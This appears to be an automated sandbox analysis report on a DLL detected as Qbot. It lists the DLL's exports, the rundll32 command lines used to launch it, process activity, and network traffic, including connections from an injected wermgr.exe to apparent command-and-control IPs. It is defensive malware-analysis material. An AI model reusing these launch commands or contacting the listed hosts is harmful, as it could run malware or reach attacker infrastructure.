mv_sha_update	473	0x100411c0
mv_shr_i	474	0x10024280
mv_size_mult	475	0x10029fa0
mv_small_strptime	476	0x10031790
mv_spherical_alloc	477	0x1004d120
mv_spherical_from_name	478	0x1004d280
mv_spherical_projection_name	479	0x1004d260
mv_spherical_tile_bounds	480	0x1004d150
mv_sscanf	481	0x10002f80
mv_stereo3d_alloc	482	0x1004d2d0
mv_stereo3d_create_side_data	483	0x1004d2f0
mv_stereo3d_from_name	484	0x1004d360
mv_stereo3d_type_name	485	0x1004d340
mv_strcasecmp	486	0x10006b30
mv_strdup	487	0x100292e0
mv_strerror	488	0x10013b30
mv_strireplace	489	0x10006bf0
mv_stristart	490	0x10006580
mv_stristr	491	0x100065f0
mv_strlcat	492	0x10006750
mv_strlcatf	493	0x100067f0
mv_strlcpy	494	0x100066e0
mv_strncasecmp	495	0x10006b80
mv_strndup	496	0x100293b0
mv_strnstr	497	0x10006660
mv_strstart	498	0x10006530
mv_strtod	499	0x100150e0
mv_strtok	500	0x10006aa0
mv_sub_i	501	0x10023d00
mv_sub_q	502	0x10035a10
mv_tea_alloc	503	0x1004d460
mv_tea_crypt	504	0x1004d4b0
mv_tea_init	505	0x1004d480
mv_tea_size	506	0x100bfc60
mv_tempfile	507	0x100195a0
mv_thread_message_flush	508	0x1004db40
mv_thread_message_queue_alloc	509	0x1004d700
mv_thread_message_queue_free	510	0x1004d7d0
mv_thread_message_queue_nb_elems	511	0x1004d880
mv_thread_message_queue_recv	512	0x1004d9b0
mv_thread_message_queue_send	513	0x1004d8d0
mv_thread_message_queue_set_err_recv	514	0x1004daf0
mv_thread_message_queue_set_err_send	515	0x1004daa0
mv_thread_message_queue_set_free_func	516	0x1004d7c0
mv_timecode_adjust_ntsc_framenum2	517	0x1004dd30
mv_timecode_check_frame_rate	518	0x1004e8c0
mv_timecode_get_smpte	519	0x1004e080
mv_timecode_get_smpte_from_framenum	520	0x1004ddd0
mv_timecode_init	521	0x1004e930
mv_timecode_init_from_components	522	0x1004ea50
mv_timecode_init_from_string	523	0x1004ec80
mv_timecode_make_mpeg_tc_string	524	0x1004e850
mv_timecode_make_smpte_tc_string	525	0x1004e720
mv_timecode_make_smpte_tc_string2	526	0x1004e520
mv_timecode_make_string	527	0x1004e270
mv_timegm	528	0x10031b50
mv_tree_destroy	529	0x1004f8f0
mv_tree_enumerate	530	0x1004fad0
mv_tree_find	531	0x1004ef60
mv_tree_insert	532	0x1004f020
mv_tree_node_alloc	533	0x1004ef40
mv_tree_node_size	534	0x100bfd80
mv_twofish_alloc	535	0x10050090
mv_twofish_crypt	536	0x100500b0
mv_twofish_init	537	0x100a8637
mv_twofish_size	538	0x100bfda0
mv_tx_init	539	0x100a9843
mv_tx_uninit	540	0x100a8f2b
mv_usleep	541	0x1004dc70
mv_utf8_decode	542	0x10007270
mv_util_ffversion	543	0x100c3fa0
mv_uuid_parse	544	0x1008d110
mv_uuid_parse_range	545	0x1008cff0
mv_uuid_unparse	546	0x1008d160
mv_uuid_urn_parse	547	0x1008d3e0
mv_vbprintf	548	0x10008b70
mv_version_info	549	0x1008d440
mv_video_enc_params_alloc	550	0x1008d480
mv_video_enc_params_create_side_data	551	0x1008d500
mv_vk_frame_alloc	552	0x10021370
mv_vkfmt_from_pixfmt	553	0x10021360
mv_vlog	554	0x10026650
mv_write_image_line	555	0x10034210
mv_write_image_line2	556	0x10033e70
mv_xtea_alloc	557	0x10090760
mv_xtea_crypt	558	0x100907d0
mv_xtea_init	559	0x10090780
mv_xtea_le_crypt	560	0x10090910
mv_xtea_le_init	561	0x100907b0
mvpriv_alloc_fixed_dsp	562	0x10019fa0
mvpriv_cga_font	563	0x100c59e0
mvpriv_dict_set_timestamp	564	0x10012370
mvpriv_float_dsp_alloc	565	0x100a7b20
mvpriv_fopen_utf8	566	0x10019a90
mvpriv_get_gamma_from_trc	567	0x1000f7d0
mvpriv_get_trc_function_from_trc	568	0x1000f800
mvpriv_init_lls	569	0x100a7f58
mvpriv_open	570	0x100195e0
mvpriv_report_missing_feature	571	0x100267e0
mvpriv_request_sample	572	0x10026730
mvpriv_scalarproduct_float_c	573	0x1001a2e0
mvpriv_set_systematic_pal2	574	0x10021bf0
mvpriv_slicethread_create	575	0x1004ce50
mvpriv_slicethread_execute	576	0x1004cb50
mvpriv_slicethread_free	577	0x1004cd20
mvpriv_solve_lls	578	0x10025270
mvpriv_tempfile	579	0x10019970
mvpriv_vga16_font	580	0x100c49e0
mvutil_configuration	581	0x1008d460
mvutil_license	582	0x1008d470
next	583	0x1001db90

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 02:02:18.646944046 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:18.647016048 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:18.647125006 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:18.651449919 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:18.651478052 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.018131971 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.018373966 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:19.178318977 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:19.178364038 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.178913116 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.179338932 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:19.180795908 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:19.224298954 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.289669991 CEST	443	49731	68.87.41.40	192.168.2.5
May 31, 2023 02:02:19.289937019 CEST	49731	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.453497887 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.453552008 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.453629971 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.453917027 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.453924894 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.803229094 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.805675030 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.806556940 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.806576967 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.809112072 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:21.809139013 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.916466951 CEST	443	49733	68.87.41.40	192.168.2.5
May 31, 2023 02:02:21.919207096 CEST	49733	443	192.168.2.5	68.87.41.40
May 31, 2023 02:02:22.575843096 CEST	49736	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:22.575916052 CEST	443	49736	124.122.47.148	192.168.2.5
May 31, 2023 02:02:22.576016903 CEST	49736	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:22.576513052 CEST	49736	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:22.576544046 CEST	443	49736	124.122.47.148	192.168.2.5
May 31, 2023 02:02:25.788850069 CEST	443	49736	124.122.47.148	192.168.2.5
May 31, 2023 02:02:26.058224916 CEST	49737	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:26.058284044 CEST	443	49737	124.122.47.148	192.168.2.5
May 31, 2023 02:02:26.058365107 CEST	49737	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:26.060563087 CEST	49737	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:26.060600042 CEST	443	49737	124.122.47.148	192.168.2.5
May 31, 2023 02:02:28.838704109 CEST	443	49737	124.122.47.148	192.168.2.5
May 31, 2023 02:02:28.839582920 CEST	49738	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.839632988 CEST	443	49738	124.122.47.148	192.168.2.5
May 31, 2023 02:02:28.840126991 CEST	49738	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.840204000 CEST	49738	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.840249062 CEST	443	49738	124.122.47.148	192.168.2.5
May 31, 2023 02:02:28.840331078 CEST	49738	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.845007896 CEST	49739	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.845082045 CEST	443	49739	124.122.47.148	192.168.2.5
May 31, 2023 02:02:28.845304966 CEST	49739	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.846070051 CEST	49739	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:28.846101999 CEST	443	49739	124.122.47.148	192.168.2.5
May 31, 2023 02:02:32.038935900 CEST	443	49739	124.122.47.148	192.168.2.5
May 31, 2023 02:02:32.040954113 CEST	49740	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:32.041023016 CEST	443	49740	124.122.47.148	192.168.2.5
May 31, 2023 02:02:32.041162968 CEST	49740	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:32.041806936 CEST	49740	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:32.041827917 CEST	443	49740	124.122.47.148	192.168.2.5
May 31, 2023 02:02:35.102032900 CEST	443	49740	124.122.47.148	192.168.2.5
May 31, 2023 02:02:35.103128910 CEST	49741	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:35.103169918 CEST	443	49741	124.122.47.148	192.168.2.5
May 31, 2023 02:02:35.103255033 CEST	49741	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:35.103368998 CEST	49741	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:35.103405952 CEST	443	49741	124.122.47.148	192.168.2.5
May 31, 2023 02:02:35.103456974 CEST	49741	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:37.121635914 CEST	49742	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:37.121701956 CEST	443	49742	124.122.47.148	192.168.2.5
May 31, 2023 02:02:37.121778011 CEST	49742	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:37.122220039 CEST	49742	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:37.122242928 CEST	443	49742	124.122.47.148	192.168.2.5
May 31, 2023 02:02:38.299043894 CEST	443	49742	124.122.47.148	192.168.2.5
May 31, 2023 02:02:38.303081036 CEST	49743	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:38.303142071 CEST	443	49743	124.122.47.148	192.168.2.5
May 31, 2023 02:02:38.303263903 CEST	49743	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:38.303643942 CEST	49743	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:38.303658962 CEST	443	49743	124.122.47.148	192.168.2.5
May 31, 2023 02:02:41.338814974 CEST	443	49743	124.122.47.148	192.168.2.5
May 31, 2023 02:02:41.339780092 CEST	49744	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.339833975 CEST	443	49744	124.122.47.148	192.168.2.5
May 31, 2023 02:02:41.339911938 CEST	49744	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.340133905 CEST	49744	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.340182066 CEST	443	49744	124.122.47.148	192.168.2.5
May 31, 2023 02:02:41.340274096 CEST	49744	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.343740940 CEST	49745	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.343780994 CEST	443	49745	124.122.47.148	192.168.2.5
May 31, 2023 02:02:41.343873024 CEST	49745	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.344304085 CEST	49745	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:41.344316959 CEST	443	49745	124.122.47.148	192.168.2.5
May 31, 2023 02:02:44.378490925 CEST	443	49745	124.122.47.148	192.168.2.5
May 31, 2023 02:02:44.379211903 CEST	49746	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:44.379277945 CEST	443	49746	124.122.47.148	192.168.2.5
May 31, 2023 02:02:44.379360914 CEST	49746	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:44.381783009 CEST	49746	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:44.381829977 CEST	443	49746	124.122.47.148	192.168.2.5
May 31, 2023 02:02:47.578855038 CEST	443	49746	124.122.47.148	192.168.2.5
May 31, 2023 02:02:47.584633112 CEST	49747	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:47.584695101 CEST	443	49747	124.122.47.148	192.168.2.5
May 31, 2023 02:02:47.584842920 CEST	49747	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:47.584963083 CEST	49747	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:47.588301897 CEST	443	49747	124.122.47.148	192.168.2.5
May 31, 2023 02:02:47.593269110 CEST	443	49747	124.122.47.148	192.168.2.5
May 31, 2023 02:02:47.593489885 CEST	49747	443	192.168.2.5	124.122.47.148
May 31, 2023 02:02:52.596609116 CEST	49748	3389	192.168.2.5	85.57.212.13
May 31, 2023 02:02:55.606086016 CEST	49748	3389	192.168.2.5	85.57.212.13
May 31, 2023 02:03:01.606621981 CEST	49748	3389	192.168.2.5	85.57.212.13
May 31, 2023 02:03:08.704651117 CEST	49749	3389	192.168.2.5	85.57.212.13
May 31, 2023 02:03:11.716850042 CEST	49749	3389	192.168.2.5	85.57.212.13

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 02:02:18.465459108 CEST	59220	53	192.168.2.5	8.8.8.8
May 31, 2023 02:02:18.638864994 CEST	53	59220	8.8.8.8	192.168.2.5
May 31, 2023 02:02:19.295789957 CEST	55068	53	192.168.2.5	8.8.8.8

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 31, 2023 02:02:55.646030903 CEST	85.57.212.13	192.168.2.5	e919	(Host unreachable)	Destination Unreachable
May 31, 2023 02:02:58.656105042 CEST	85.57.212.13	192.168.2.5	e919	(Host unreachable)	Destination Unreachable
May 31, 2023 02:03:04.658116102 CEST	85.57.212.13	192.168.2.5	e919	(Host unreachable)	Destination Unreachable
May 31, 2023 02:03:10.740196943 CEST	85.57.212.13	192.168.2.5	e919	(Host unreachable)	Destination Unreachable
May 31, 2023 02:03:14.767111063 CEST	85.57.212.13	192.168.2.5	e919	(Host unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 31, 2023 02:02:18.465459108 CEST	192.168.2.5	8.8.8.8	0xb38e	Standard query (0)	xfinity.com	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:19.295789957 CEST	192.168.2.5	8.8.8.8	0xb2e3	Standard query (0)	www.xfinity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 31, 2023 02:02:18.638864994 CEST	8.8.8.8	192.168.2.5	0xb38e	No error (0)	xfinity.com		68.87.41.40	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:18.638864994 CEST	8.8.8.8	192.168.2.5	0xb38e	No error (0)	xfinity.com		96.114.21.40	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:18.638864994 CEST	8.8.8.8	192.168.2.5	0xb38e	No error (0)	xfinity.com		96.114.14.140	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:19.331722975 CEST	8.8.8.8	192.168.2.5	0xb2e3	No error (0)	www.xfinity.com	www.xfinity.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

xfinity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49731	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 00:02:19 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache
2023-05-31 00:02:19 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49733	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 00:02:21 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache Cookie: xpgn=1
2023-05-31 00:02:21 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 4332, Parent PID: 3324

General

Target ID:	0
Start time:	01:59:07
Start date:	31/05/2023
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\F072.dll"
Imagebase:	0x2e0000
File size:	126464 bytes
MD5 hash:	3B4636AE519868037940CA5C4272091B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2528, Parent PID: 4332

General

Target ID:	1
Start time:	01:59:07
Start date:	31/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5268, Parent PID: 4332

General

Target ID:	2
Start time:	01:59:07
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5240, Parent PID: 4332

General

Target ID:	3
Start time:	01:59:07
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5236, Parent PID: 5268

General

Target ID:	4
Start time:	01:59:07
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6832, Parent PID: 5236

General

Target ID:	8
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664
Imagebase:	0x910000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6812, Parent PID: 5240

General

Target ID:	9
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664
Imagebase:	0x910000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7020, Parent PID: 4332

General

Target ID:	10
Start time:	01:59:10
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5708, Parent PID: 4332

General

Target ID:	11
Start time:	01:59:13
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5696, Parent PID: 5708

General

Target ID:	13
Start time:	01:59:13
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652
Imagebase:	0x910000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4732, Parent PID: 4332

General

Target ID:	14
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4708, Parent PID: 4332

General

Target ID:	15
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4696, Parent PID: 4332

General

Target ID:	16
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5400, Parent PID: 4332

General

Target ID:	17
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",next
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5388, Parent PID: 4332

General

Target ID:	18
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5636, Parent PID: 4332

General

Target ID:	19
Start time:	01:59:16
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration
Imagebase:	0x9a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 2872, Parent PID: 4696

General

Target ID:	22
Start time:	01:59:17
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652
Imagebase:	0x910000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5704, Parent PID: 4732

General

Target ID:	23
Start time:	01:59:17
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652
Imagebase:	0x910000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 6828, Parent PID: 5400

General

Target ID:	24
Start time:	01:59:20
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x1080000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 5240, Parent PID: 4332COMMON

Non-executed Functions

Function 100206A7 Relevance: 142.6, APIs: 68, Strings: 13, Instructions: 805libraryCOMMON

Download Yara Rule

APIs

atoi.MSVCRT ref: 100206E2
mv_mallocz.F072 ref: 100206F2
MultiByteToWideChar.KERNEL32 ref: 1002074D
mv_calloc.F072 ref: 10020768
MultiByteToWideChar.KERNEL32 ref: 100207A0
LoadLibraryExW.KERNEL32 ref: 100207F2
MultiByteToWideChar.KERNEL32 ref: 1002083E
mv_calloc.F072 ref: 10020859
MultiByteToWideChar.KERNEL32 ref: 10020891
LoadLibraryExW.KERNEL32 ref: 100208D9
GetDesktopWindow.USER32 ref: 10020A0C
mv_log.F072 ref: 10020A76
_errno.MSVCRT ref: 10020AFA
mv_log.F072 ref: 10020B82
_errno.MSVCRT ref: 10020B9A
mv_log.F072 ref: 10020C18
wcslen.MSVCRT ref: 10020E1E
mv_realloc_array.F072 ref: 10020E84
LoadLibraryExA.KERNEL32 ref: 10020ED6
mv_log.F072 ref: 10021263
mv_log.F072 ref: 100212AF
mv_log.F072 ref: 100212D5

Strings

DXVA2CreateDirect3DDeviceManager9, xrefs: 100208FA
Using D3D9Ex device., xrefs: 10020A61
SetDefaultDllDirectories, xrefs: 100207B7, 100208A3, 10020B22, 10020BBD
Failed to create Direct3D device manager, xrefs: 1002126D
Failed to open device handle, xrefs: 100212C0
Failed to load D3D9 library, xrefs: 10020B66
Failed to bind Direct3D device to device manager, xrefs: 1002129A
Failed to locate DXVA2CreateDirect3DDeviceManager9, xrefs: 1002124E
Failed to load DXVA2 library, xrefs: 10020BFC
dxva2.dll, xrefs: 1002081B, 10020877, 10020EF0
d3d9.dll, xrefs: 10020722, 10020786, 10020EC0
Direct3DCreate9, xrefs: 10020C87
Direct3DCreate9Ex, xrefs: 10020986

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

